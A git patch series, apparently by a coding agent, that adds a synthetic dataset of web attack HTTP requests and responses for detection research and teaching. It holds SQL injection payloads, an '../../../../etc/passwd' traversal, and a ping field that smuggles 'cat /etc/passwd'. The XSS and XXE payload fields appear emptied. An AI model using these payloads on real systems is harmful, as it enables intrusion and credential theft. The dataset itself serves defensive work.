From 1c353e549ffa9c64b775307d457bbac598a374d8 Mon Sep 17 00:00:00 2001 From: "copilot-swe-agent[bot]" <198982749+Copilot@users.noreply.github.com> Date: Tue, 28 Oct 2025 13:46:45 +0000 Subject: [PATCH 1/3] Initial plan From 5c10ba5fe191bf180bc6ebc3a3ba42e71964e7c5 Mon Sep 17 00:00:00 2001 From: "copilot-swe-agent[bot]" <198982749+Copilot@users.noreply.github.com> Date: Tue, 28 Oct 2025 13:52:47 +0000 Subject: [PATCH 2/3] Add comprehensive HTTP security dataset with examples and documentation Co-authored-by: rodolfovalentim <3588086+rodolfovalentim@users.noreply.github.com> --- README.md | 206 ++++++++++++++++++++++- dataset/command-injection/example-1.json | 29 ++++ dataset/csrf/example-1.json | 31 ++++ dataset/index.json | 72 ++++++++ dataset/path-traversal/example-1.json | 30 ++++ dataset/schema.json | 96 +++++++++++ dataset/sql-injection/example-1.json | 30 ++++ dataset/sql-injection/example-2.json | 29 ++++ dataset/xss/example-1.json | 29 ++++ dataset/xss/example-2.json | 29 ++++ dataset/xxe/example-1.json | 30 ++++ examples/load_dataset.js | 173 +++++++++++++++++++ examples/load_dataset.py | 143 ++++++++++++++++ 13 files changed, 926 insertions(+), 1 deletion(-) create mode 100644 dataset/command-injection/example-1.json create mode 100644 dataset/csrf/example-1.json create mode 100644 dataset/index.json create mode 100644 dataset/path-traversal/example-1.json create mode 100644 dataset/schema.json create mode 100644 dataset/sql-injection/example-1.json create mode 100644 dataset/sql-injection/example-2.json create mode 100644 dataset/xss/example-1.json create mode 100644 dataset/xss/example-2.json create mode 100644 dataset/xxe/example-1.json create mode 100644 examples/load_dataset.js create mode 100644 examples/load_dataset.py diff --git a/README.md b/README.md index dbfdca5..e416cf2 100644 --- a/README.md +++ b/README.md @@ -1 +1,205 @@ -# synthetic-security-dataset \ No newline at end of file +# Synthetic Security Dataset + +A comprehensive dataset of 
HTTP request and response examples demonstrating various types of malicious attacks. This dataset is designed for security research, training machine learning models for threat detection, and educational purposes. + +## Overview + +This repository contains synthetic examples of common web application security attacks, organized by attack category. Each example includes: + +- Complete HTTP request details (method, URL, headers, body) +- Corresponding HTTP response +- Attack vector description +- Malicious payload +- Detection indicators + +## Dataset Structure + +``` +dataset/ +├── schema.json # JSON schema defining the data structure +├── sql-injection/ # SQL injection attack examples +├── xss/ # Cross-Site Scripting (XSS) examples +├── csrf/ # Cross-Site Request Forgery examples +├── path-traversal/ # Directory/path traversal examples +├── command-injection/ # OS command injection examples +└── xxe/ # XML External Entity (XXE) examples +``` + +## Attack Categories + +### 1. SQL Injection +SQL injection attacks attempt to manipulate database queries by inserting malicious SQL code into input fields. + +**Examples:** +- Authentication bypass +- UNION-based data extraction +- Blind SQL injection + +### 2. Cross-Site Scripting (XSS) +XSS attacks inject malicious scripts into web pages viewed by other users. + +**Examples:** +- Reflected XSS via URL parameters +- Stored XSS via user-generated content +- DOM-based XSS + +### 3. Cross-Site Request Forgery (CSRF) +CSRF attacks trick users into executing unwanted actions on web applications where they're authenticated. + +**Examples:** +- State-changing requests without CSRF tokens +- Malicious form auto-submission + +### 4. Path Traversal +Path traversal attacks access files and directories outside the intended directory structure. + +**Examples:** +- Reading system files using dot-dot-slash sequences +- Accessing sensitive configuration files + +### 5. 
Command Injection +Command injection attacks execute arbitrary operating system commands on the server. + +**Examples:** +- Command chaining using semicolons +- Piping commands +- Command substitution + +### 6. XML External Entity (XXE) +XXE attacks exploit XML parsers that process external entity references. + +**Examples:** +- Local file disclosure +- Server-side request forgery (SSRF) +- Denial of service + +## Data Format + +Each attack example is stored as a JSON file following this structure: + +```json +{ + "id": "unique-identifier", + "category": "Attack Category", + "description": "Description of the attack scenario", + "severity": "critical|high|medium|low", + "request": { + "method": "HTTP_METHOD", + "url": "/path?params", + "headers": {}, + "body": "request body or null" + }, + "response": { + "status": 200, + "headers": {}, + "body": "response body" + }, + "attack_vector": "Explanation of how the attack works", + "payload": "The actual malicious payload", + "indicators": ["indicator1", "indicator2"] +} +``` + +See `dataset/schema.json` for the complete JSON schema definition. 
+ +## Usage + +### Loading the Dataset + +#### Python +```python +import json +import os +from pathlib import Path + +def load_dataset(dataset_path='dataset'): + examples = [] + for category_dir in Path(dataset_path).iterdir(): + if category_dir.is_dir(): + for example_file in category_dir.glob('*.json'): + with open(example_file, 'r') as f: + examples.append(json.load(f)) + return examples + +# Load all examples +dataset = load_dataset() +print(f"Loaded {len(dataset)} attack examples") +``` + +#### JavaScript/Node.js +```javascript +const fs = require('fs'); +const path = require('path'); + +function loadDataset(datasetPath = 'dataset') { + const examples = []; + const categories = fs.readdirSync(datasetPath); + + categories.forEach(category => { + const categoryPath = path.join(datasetPath, category); + if (fs.statSync(categoryPath).isDirectory()) { + const files = fs.readdirSync(categoryPath); + files.forEach(file => { + if (file.endsWith('.json') && file !== 'schema.json') { + const data = JSON.parse( + fs.readFileSync(path.join(categoryPath, file), 'utf8') + ); + examples.push(data); + } + }); + } + }); + + return examples; +} + +// Load all examples +const dataset = loadDataset(); +console.log(`Loaded ${dataset.length} attack examples`); +``` + +### Filtering by Category + +```python +# Get all SQL injection examples +sql_injections = [ex for ex in dataset if ex['category'] == 'SQL Injection'] + +# Get all critical severity attacks +critical_attacks = [ex for ex in dataset if ex['severity'] == 'critical'] +``` + +## Use Cases + +1. **Security Training**: Educational resource for learning about common web vulnerabilities +2. **Machine Learning**: Training data for developing attack detection models +3. **Testing Security Tools**: Benchmark dataset for evaluating WAF, IDS/IPS systems +4. **Security Research**: Reference examples for studying attack patterns +5. 
**CTF Challenges**: Base material for capture-the-flag security exercises + +## Contributing + +Contributions are welcome! To add new attack examples: + +1. Follow the JSON schema defined in `dataset/schema.json` +2. Place the example in the appropriate category directory +3. Use descriptive IDs and clear descriptions +4. Include realistic HTTP headers and responses +5. Provide clear indicators for detection + +## Important Notes + +⚠️ **Warning**: This dataset contains examples of malicious attacks. Use only for: +- Educational purposes +- Security research +- Controlled testing environments +- Training security systems + +**DO NOT** use these examples to attack real systems. Unauthorized access to computer systems is illegal. + +## License + +This dataset is provided for educational and research purposes. Please use responsibly and ethically. + +## Disclaimer + +The examples in this dataset are synthetic and created for educational purposes. They should only be used in controlled environments with proper authorization. The maintainers are not responsible for any misuse of this information. 
\ No newline at end of file diff --git a/dataset/command-injection/example-1.json b/dataset/command-injection/example-1.json new file mode 100644 index 0000000..27bf765 --- /dev/null +++ b/dataset/command-injection/example-1.json @@ -0,0 +1,29 @@ +{ + "id": "command-injection-001", + "category": "Command Injection", + "description": "OS command injection through ping utility", + "severity": "critical", + "request": { + "method": "POST", + "url": "/network-tools/ping", + "headers": { + "Content-Type": "application/json", + "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)" + }, + "body": "{\"host\": \"8.8.8.8; cat /etc/passwd\"}" + }, + "response": { + "status": 200, + "headers": { + "Content-Type": "text/plain" + }, + "body": "PING 8.8.8.8 (8.8.8.8) 56(84) bytes of data.\n64 bytes from 8.8.8.8: icmp_seq=1 ttl=64 time=0.045 ms\n\nroot:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin" + }, + "attack_vector": "Command injection using semicolon to chain commands", + "payload": "8.8.8.8; cat /etc/passwd", + "indicators": [ + "Command separators (;, &&, ||)", + "System commands in user input", + "Unexpected command output in response" + ] +} diff --git a/dataset/csrf/example-1.json b/dataset/csrf/example-1.json new file mode 100644 index 0000000..c29f31e --- /dev/null +++ b/dataset/csrf/example-1.json @@ -0,0 +1,31 @@ +{ + "id": "csrf-001", + "category": "Cross-Site Request Forgery (CSRF)", + "description": "CSRF attack to transfer funds without user consent", + "severity": "high", + "request": { + "method": "POST", + "url": "/transfer", + "headers": { + "Content-Type": "application/x-www-form-urlencoded", + "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)", + "Referer": "http://attacker.com/malicious.html", + "Cookie": "session=victim_session_token" + }, + "body": "to_account=attacker_account&amount=1000&currency=USD" + }, + "response": { + "status": 200, + "headers": { + "Content-Type": "application/json" + }, + "body": "{\"status\": 
\"success\", \"message\": \"Transfer completed\", \"transaction_id\": \"txn_987654\"}" + }, + "attack_vector": "CSRF attack initiated from external malicious site", + "payload": "Malicious HTML form auto-submitting to transfer endpoint", + "indicators": [ + "Missing or invalid CSRF token", + "Referer from external domain", + "Unexpected state-changing request" + ] +} diff --git a/dataset/index.json b/dataset/index.json new file mode 100644 index 0000000..10a34fe --- /dev/null +++ b/dataset/index.json @@ -0,0 +1,72 @@ +{ + "dataset_version": "1.0.0", + "created_date": "2025-10-28", + "description": "Synthetic HTTP request/response dataset for malicious attack examples", + "total_examples": 8, + "categories": { + "SQL Injection": { + "count": 2, + "severity_distribution": { + "critical": 2 + }, + "examples": [ + "dataset/sql-injection/example-1.json", + "dataset/sql-injection/example-2.json" + ] + }, + "Cross-Site Scripting (XSS)": { + "count": 2, + "severity_distribution": { + "high": 2 + }, + "examples": [ + "dataset/xss/example-1.json", + "dataset/xss/example-2.json" + ] + }, + "Cross-Site Request Forgery (CSRF)": { + "count": 1, + "severity_distribution": { + "high": 1 + }, + "examples": [ + "dataset/csrf/example-1.json" + ] + }, + "Path Traversal": { + "count": 1, + "severity_distribution": { + "critical": 1 + }, + "examples": [ + "dataset/path-traversal/example-1.json" + ] + }, + "Command Injection": { + "count": 1, + "severity_distribution": { + "critical": 1 + }, + "examples": [ + "dataset/command-injection/example-1.json" + ] + }, + "XML External Entity (XXE)": { + "count": 1, + "severity_distribution": { + "critical": 1 + }, + "examples": [ + "dataset/xxe/example-1.json" + ] + } + }, + "severity_overview": { + "critical": 5, + "high": 3, + "medium": 0, + "low": 0 + }, + "schema_version": "1.0.0", + "schema_location": "dataset/schema.json" +} diff --git a/dataset/path-traversal/example-1.json b/dataset/path-traversal/example-1.json new file mode 100644 index 
0000000..5a07988 --- /dev/null +++ b/dataset/path-traversal/example-1.json @@ -0,0 +1,30 @@ +{ + "id": "path-traversal-001", + "category": "Path Traversal", + "description": "Directory traversal attack to access sensitive files", + "severity": "critical", + "request": { + "method": "GET", + "url": "/download?file=../../../../etc/passwd", + "headers": { + "User-Agent": "Mozilla/5.0 (X11; Linux x86_64)", + "Accept": "*/*" + }, + "body": null + }, + "response": { + "status": 200, + "headers": { + "Content-Type": "text/plain", + "Content-Disposition": "attachment; filename=passwd" + }, + "body": "root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin" + }, + "attack_vector": "Path traversal using dot-dot-slash sequences", + "payload": "../../../../etc/passwd", + "indicators": [ + "Dot-dot-slash sequences (../)", + "Access to system files", + "Path manipulation in file parameter" + ] +} diff --git a/dataset/schema.json b/dataset/schema.json new file mode 100644 index 0000000..bde1d4e --- /dev/null +++ b/dataset/schema.json @@ -0,0 +1,96 @@ +{ + "$schema": "http://json-schema.org/draft-07/schema#", + "title": "Synthetic Security Dataset Entry", + "description": "Schema for HTTP request/response examples of malicious attacks", + "type": "object", + "required": ["id", "category", "description", "severity", "request", "response", "attack_vector", "payload", "indicators"], + "properties": { + "id": { + "type": "string", + "description": "Unique identifier for the attack example", + "pattern": "^[a-z0-9-]+$" + }, + "category": { + "type": "string", + "description": "Attack category/type", + "enum": [ + "SQL Injection", + "Cross-Site Scripting (XSS)", + "Cross-Site Request Forgery (CSRF)", + "Path Traversal", + "Command Injection", + "XML External Entity (XXE)" + ] + }, + "description": { + "type": "string", + "description": "Detailed description of the attack scenario" + }, + "severity": { + "type": "string", + 
"description": "Severity level of the attack", + "enum": ["low", "medium", "high", "critical"] + }, + "request": { + "type": "object", + "description": "HTTP request details", + "required": ["method", "url", "headers"], + "properties": { + "method": { + "type": "string", + "description": "HTTP method", + "enum": ["GET", "POST", "PUT", "DELETE", "PATCH", "HEAD", "OPTIONS"] + }, + "url": { + "type": "string", + "description": "Request URL including path and query parameters" + }, + "headers": { + "type": "object", + "description": "HTTP request headers" + }, + "body": { + "type": ["string", "null"], + "description": "Request body content" + } + } + }, + "response": { + "type": "object", + "description": "HTTP response details", + "required": ["status", "headers", "body"], + "properties": { + "status": { + "type": "integer", + "description": "HTTP status code", + "minimum": 100, + "maximum": 599 + }, + "headers": { + "type": "object", + "description": "HTTP response headers" + }, + "body": { + "type": ["string", "null"], + "description": "Response body content" + } + } + }, + "attack_vector": { + "type": "string", + "description": "Explanation of how the attack works" + }, + "payload": { + "type": "string", + "description": "The actual malicious payload used in the attack" + }, + "indicators": { + "type": "array", + "description": "List of indicators that can help detect this type of attack", + "items": { + "type": "string" + }, + "minItems": 1 + } + } +} diff --git a/dataset/sql-injection/example-1.json b/dataset/sql-injection/example-1.json new file mode 100644 index 0000000..050634b --- /dev/null +++ b/dataset/sql-injection/example-1.json @@ -0,0 +1,30 @@ +{ + "id": "sql-injection-001", + "category": "SQL Injection", + "description": "Classic SQL injection attack attempting to bypass authentication", + "severity": "critical", + "request": { + "method": "POST", + "url": "/login", + "headers": { + "Content-Type": "application/x-www-form-urlencoded", + "User-Agent": 
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" + }, + "body": "username=admin' OR '1'='1&password=anything" + }, + "response": { + "status": 200, + "headers": { + "Content-Type": "application/json", + "Set-Cookie": "session=abc123; HttpOnly; Secure" + }, + "body": "{\"status\": \"success\", \"message\": \"Login successful\", \"user_id\": 1}" + }, + "attack_vector": "Authentication bypass using SQL injection in username field", + "payload": "admin' OR '1'='1", + "indicators": [ + "SQL syntax in input fields", + "Quote characters in username", + "Logical operators (OR) in input" + ] +} diff --git a/dataset/sql-injection/example-2.json b/dataset/sql-injection/example-2.json new file mode 100644 index 0000000..5d847ec --- /dev/null +++ b/dataset/sql-injection/example-2.json @@ -0,0 +1,29 @@ +{ + "id": "sql-injection-002", + "category": "SQL Injection", + "description": "SQL injection using UNION-based attack to extract data", + "severity": "critical", + "request": { + "method": "GET", + "url": "/product?id=1' UNION SELECT username,password FROM users--", + "headers": { + "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36", + "Accept": "text/html,application/xhtml+xml" + }, + "body": null + }, + "response": { + "status": 200, + "headers": { + "Content-Type": "text/html; charset=utf-8" + }, + "body": "

Product Details

admin:$2y$10$hashedpassword

" + }, + "attack_vector": "Data exfiltration using UNION-based SQL injection", + "payload": "1' UNION SELECT username,password FROM users--", + "indicators": [ + "UNION keyword in URL parameter", + "SQL comment markers (--)", + "Quote characters in parameter value" + ] +} diff --git a/dataset/xss/example-1.json b/dataset/xss/example-1.json new file mode 100644 index 0000000..7d4ea05 --- /dev/null +++ b/dataset/xss/example-1.json @@ -0,0 +1,29 @@ +{ + "id": "xss-001", + "category": "Cross-Site Scripting (XSS)", + "description": "Reflected XSS attack through URL parameter", + "severity": "high", + "request": { + "method": "GET", + "url": "/search?q=", + "headers": { + "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36", + "Accept": "text/html" + }, + "body": null + }, + "response": { + "status": 200, + "headers": { + "Content-Type": "text/html; charset=utf-8" + }, + "body": "

Search Results for:

No results found

" + }, + "attack_vector": "Reflected XSS via search parameter", + "payload": "", + "indicators": [ + "Script tags in URL parameters", + "JavaScript code in input", + "Unescaped user input reflected in HTML" + ] +} diff --git a/dataset/xss/example-2.json b/dataset/xss/example-2.json new file mode 100644 index 0000000..7266858 --- /dev/null +++ b/dataset/xss/example-2.json @@ -0,0 +1,29 @@ +{ + "id": "xss-002", + "category": "Cross-Site Scripting (XSS)", + "description": "Stored XSS attack via comment submission", + "severity": "high", + "request": { + "method": "POST", + "url": "/comments", + "headers": { + "Content-Type": "application/json", + "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)" + }, + "body": "{\"comment\": \"\", \"post_id\": 123}" + }, + "response": { + "status": 201, + "headers": { + "Content-Type": "application/json" + }, + "body": "{\"status\": \"success\", \"message\": \"Comment posted\", \"comment_id\": 456}" + }, + "attack_vector": "Stored XSS using malicious image tag with onerror event handler", + "payload": "", + "indicators": [ + "HTML tags in comment content", + "JavaScript event handlers (onerror)", + "External domain references" + ] +} diff --git a/dataset/xxe/example-1.json b/dataset/xxe/example-1.json new file mode 100644 index 0000000..acbc40f --- /dev/null +++ b/dataset/xxe/example-1.json @@ -0,0 +1,30 @@ +{ + "id": "xxe-001", + "category": "XML External Entity (XXE)", + "description": "XXE attack to read local files through XML parsing", + "severity": "critical", + "request": { + "method": "POST", + "url": "/api/xml/process", + "headers": { + "Content-Type": "application/xml", + "User-Agent": "Mozilla/5.0 (X11; Linux x86_64)" + }, + "body": "\n]>\n\n &xxe;\n" + }, + "response": { + "status": 200, + "headers": { + "Content-Type": "application/xml" + }, + "body": "\n\n root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n processed\n" + }, + "attack_vector": "XXE attack using external entity 
to read system files", + "payload": "", + "indicators": [ + "DOCTYPE declaration with ENTITY", + "SYSTEM keyword in XML", + "External entity references", + "File protocol in entity definition" + ] +} diff --git a/examples/load_dataset.js b/examples/load_dataset.js new file mode 100644 index 0000000..c2935de --- /dev/null +++ b/examples/load_dataset.js @@ -0,0 +1,173 @@ +#!/usr/bin/env node +/** + * Example script to load and analyze the synthetic security dataset using Node.js + */ + +const fs = require('fs'); +const path = require('path'); + +/** + * Load all attack examples from the dataset + * @param {string} datasetPath - Path to the dataset directory + * @returns {Array} Array of attack example objects + */ +function loadDataset(datasetPath = 'dataset') { + const examples = []; + + try { + const entries = fs.readdirSync(datasetPath); + + entries.forEach(entry => { + const entryPath = path.join(datasetPath, entry); + const stats = fs.statSync(entryPath); + + if (stats.isDirectory()) { + const files = fs.readdirSync(entryPath); + files.forEach(file => { + if (file.endsWith('.json')) { + const filePath = path.join(entryPath, file); + const data = JSON.parse(fs.readFileSync(filePath, 'utf8')); + data.file_path = filePath; + examples.push(data); + } + }); + } + }); + } catch (error) { + console.error('Error loading dataset:', error.message); + } + + return examples; +} + +/** + * Analyze the dataset and print statistics + * @param {Array} examples - Array of attack examples + */ +function analyzeDataset(examples) { + console.log('\n' + '='.repeat(60)); + console.log('Dataset Statistics'); + console.log('='.repeat(60) + '\n'); + + console.log(`Total Examples: ${examples.length}`); + + // Category distribution + const categories = {}; + examples.forEach(ex => { + categories[ex.category] = (categories[ex.category] || 0) + 1; + }); + + console.log('\nCategory Distribution:'); + Object.keys(categories).sort().forEach(category => { + console.log(` - ${category}: 
${categories[category]}`); + }); + + // Severity distribution + const severities = {}; + examples.forEach(ex => { + severities[ex.severity] = (severities[ex.severity] || 0) + 1; + }); + + console.log('\nSeverity Distribution:'); + ['critical', 'high', 'medium', 'low'].forEach(severity => { + if (severities[severity]) { + console.log(` - ${severity.charAt(0).toUpperCase() + severity.slice(1)}: ${severities[severity]}`); + } + }); + + // HTTP methods + const methods = {}; + examples.forEach(ex => { + methods[ex.request.method] = (methods[ex.request.method] || 0) + 1; + }); + + console.log('\nHTTP Methods Used:'); + Object.keys(methods).sort().forEach(method => { + console.log(` - ${method}: ${methods[method]}`); + }); +} + +/** + * Display a formatted attack example + * @param {Object} example - Attack example object + */ +function showExample(example) { + console.log('\n' + '='.repeat(60)); + console.log(`Example: ${example.id}`); + console.log('='.repeat(60)); + console.log(`Category: ${example.category}`); + console.log(`Severity: ${example.severity.toUpperCase()}`); + console.log(`Description: ${example.description}`); + console.log(`\nAttack Vector: ${example.attack_vector}`); + console.log(`\nPayload: ${example.payload}`); + + console.log('\nHTTP Request:'); + console.log(` ${example.request.method} ${example.request.url}`); + console.log(' Headers:'); + Object.entries(example.request.headers).forEach(([key, value]) => { + console.log(` ${key}: ${value}`); + }); + if (example.request.body) { + const bodyPreview = example.request.body.length > 100 + ? example.request.body.substring(0, 100) + '...' 
+ : example.request.body; + console.log(` Body: ${bodyPreview}`); + } + + console.log('\nHTTP Response:'); + console.log(` Status: ${example.response.status}`); + console.log(' Headers:'); + Object.entries(example.response.headers).forEach(([key, value]) => { + console.log(` ${key}: ${value}`); + }); + if (example.response.body) { + const bodyPreview = example.response.body.length > 100 + ? example.response.body.substring(0, 100) + '...' + : example.response.body; + console.log(` Body: ${bodyPreview}`); + } + + console.log('\nDetection Indicators:'); + example.indicators.forEach(indicator => { + console.log(` - ${indicator}`); + }); +} + +/** + * Main function to demonstrate dataset usage + */ +function main() { + console.log('Loading synthetic security dataset...'); + const examples = loadDataset(); + + // Analyze and show statistics + analyzeDataset(examples); + + // Show a few examples + console.log('\n\n' + '#'.repeat(60)); + console.log('Sample Attack Examples'); + console.log('#'.repeat(60)); + + // Show first example from each category + const shownCategories = new Set(); + for (const example of examples) { + if (!shownCategories.has(example.category)) { + showExample(example); + shownCategories.add(example.category); + if (shownCategories.size >= 3) { + break; + } + } + } + + console.log('\n' + '='.repeat(60)); + console.log('For more examples, explore the dataset/ directory'); + console.log('='.repeat(60) + '\n'); +} + +// Run the main function +if (require.main === module) { + main(); +} + +module.exports = { loadDataset, analyzeDataset, showExample }; diff --git a/examples/load_dataset.py b/examples/load_dataset.py new file mode 100644 index 0000000..c4f6230 --- /dev/null +++ b/examples/load_dataset.py @@ -0,0 +1,143 @@ +#!/usr/bin/env python3 +""" +Example script to load and analyze the synthetic security dataset. 
+""" + +import json +import os +from pathlib import Path +from collections import defaultdict + + +def load_dataset(dataset_path='dataset'): + """ + Load all attack examples from the dataset. + + Args: + dataset_path: Path to the dataset directory + + Returns: + List of attack example dictionaries + """ + examples = [] + dataset_dir = Path(dataset_path) + + for category_dir in dataset_dir.iterdir(): + if category_dir.is_dir(): + for example_file in category_dir.glob('*.json'): + with open(example_file, 'r') as f: + example = json.load(f) + example['file_path'] = str(example_file) + examples.append(example) + + return examples + + +def analyze_dataset(examples): + """ + Analyze the dataset and print statistics. + + Args: + examples: List of attack examples + """ + print(f"\n{'='*60}") + print(f"Dataset Statistics") + print(f"{'='*60}\n") + + print(f"Total Examples: {len(examples)}") + + # Category distribution + categories = defaultdict(int) + for ex in examples: + categories[ex['category']] += 1 + + print(f"\nCategory Distribution:") + for category, count in sorted(categories.items()): + print(f" - {category}: {count}") + + # Severity distribution + severities = defaultdict(int) + for ex in examples: + severities[ex['severity']] += 1 + + print(f"\nSeverity Distribution:") + for severity in ['critical', 'high', 'medium', 'low']: + if severity in severities: + print(f" - {severity.capitalize()}: {severities[severity]}") + + # HTTP methods + methods = defaultdict(int) + for ex in examples: + methods[ex['request']['method']] += 1 + + print(f"\nHTTP Methods Used:") + for method, count in sorted(methods.items()): + print(f" - {method}: {count}") + + +def show_example(example): + """ + Display a formatted attack example. 
+ + Args: + example: Attack example dictionary + """ + print(f"\n{'='*60}") + print(f"Example: {example['id']}") + print(f"{'='*60}") + print(f"Category: {example['category']}") + print(f"Severity: {example['severity'].upper()}") + print(f"Description: {example['description']}") + print(f"\nAttack Vector: {example['attack_vector']}") + print(f"\nPayload: {example['payload']}") + print(f"\nHTTP Request:") + print(f" {example['request']['method']} {example['request']['url']}") + print(f" Headers:") + for key, value in example['request']['headers'].items(): + print(f" {key}: {value}") + if example['request']['body']: + print(f" Body: {example['request']['body'][:100]}...") + + print(f"\nHTTP Response:") + print(f" Status: {example['response']['status']}") + print(f" Headers:") + for key, value in example['response']['headers'].items(): + print(f" {key}: {value}") + if example['response']['body']: + print(f" Body: {example['response']['body'][:100]}...") + + print(f"\nDetection Indicators:") + for indicator in example['indicators']: + print(f" - {indicator}") + + +def main(): + """Main function to demonstrate dataset usage.""" + # Load the dataset + print("Loading synthetic security dataset...") + examples = load_dataset() + + # Analyze and show statistics + analyze_dataset(examples) + + # Show a few examples + print(f"\n\n{'#'*60}") + print("Sample Attack Examples") + print(f"{'#'*60}") + + # Show first example from each category + shown_categories = set() + for example in examples: + if example['category'] not in shown_categories: + show_example(example) + shown_categories.add(example['category']) + if len(shown_categories) >= 3: # Show only first 3 categories + break + + print(f"\n{'='*60}") + print(f"For more examples, explore the dataset/ directory") + print(f"{'='*60}\n") + + +if __name__ == '__main__': + main() From 40ebcda7c8c681a75007786faa2412e40ba54d0e Mon Sep 17 00:00:00 2001 From: "copilot-swe-agent[bot]" <198982749+Copilot@users.noreply.github.com> Date: 
Tue, 28 Oct 2025 13:55:56 +0000 Subject: [PATCH 3/3] Add error handling to example scripts and fix README code samples Co-authored-by: rodolfovalentim <3588086+rodolfovalentim@users.noreply.github.com> --- README.md | 21 ++++++++++++++------- examples/load_dataset.js | 10 +++++++--- examples/load_dataset.py | 14 ++++++++++---- 3 files changed, 31 insertions(+), 14 deletions(-) diff --git a/README.md b/README.md index e416cf2..862b70e 100644 --- a/README.md +++ b/README.md @@ -117,8 +117,11 @@ def load_dataset(dataset_path='dataset'): for category_dir in Path(dataset_path).iterdir(): if category_dir.is_dir(): for example_file in category_dir.glob('*.json'): - with open(example_file, 'r') as f: - examples.append(json.load(f)) + try: + with open(example_file, 'r') as f: + examples.append(json.load(f)) + except json.JSONDecodeError as e: + print(f"Error parsing {example_file}: {e}") return examples # Load all examples @@ -140,11 +143,15 @@ function loadDataset(datasetPath = 'dataset') { if (fs.statSync(categoryPath).isDirectory()) { const files = fs.readdirSync(categoryPath); files.forEach(file => { - if (file.endsWith('.json') && file !== 'schema.json') { - const data = JSON.parse( - fs.readFileSync(path.join(categoryPath, file), 'utf8') - ); - examples.push(data); + if (file.endsWith('.json')) { + try { + const data = JSON.parse( + fs.readFileSync(path.join(categoryPath, file), 'utf8') + ); + examples.push(data); + } catch (error) { + console.error(`Error parsing ${file}:`, error.message); + } } }); } diff --git a/examples/load_dataset.js b/examples/load_dataset.js index c2935de..75eaeeb 100644 --- a/examples/load_dataset.js +++ b/examples/load_dataset.js @@ -26,9 +26,13 @@ function loadDataset(datasetPath = 'dataset') { files.forEach(file => { if (file.endsWith('.json')) { const filePath = path.join(entryPath, file); - const data = JSON.parse(fs.readFileSync(filePath, 'utf8')); - data.file_path = filePath; - examples.push(data); + try { + const data = 
JSON.parse(fs.readFileSync(filePath, 'utf8')); + data.file_path = filePath; + examples.push(data); + } catch (error) { + console.error(`Error parsing JSON in ${filePath}:`, error.message); + } } }); } diff --git a/examples/load_dataset.py b/examples/load_dataset.py index c4f6230..b7ff630 100644 --- a/examples/load_dataset.py +++ b/examples/load_dataset.py @@ -5,6 +5,7 @@ import json import os +import sys from pathlib import Path from collections import defaultdict @@ -25,10 +26,15 @@ def load_dataset(dataset_path='dataset'): for category_dir in dataset_dir.iterdir(): if category_dir.is_dir(): for example_file in category_dir.glob('*.json'): - with open(example_file, 'r') as f: - example = json.load(f) - example['file_path'] = str(example_file) - examples.append(example) + try: + with open(example_file, 'r') as f: + example = json.load(f) + example['file_path'] = str(example_file) + examples.append(example) + except json.JSONDecodeError as e: + print(f"Error parsing JSON in {example_file}: {e}", file=sys.stderr) + except Exception as e: + print(f"Error reading {example_file}: {e}", file=sys.stderr) return examples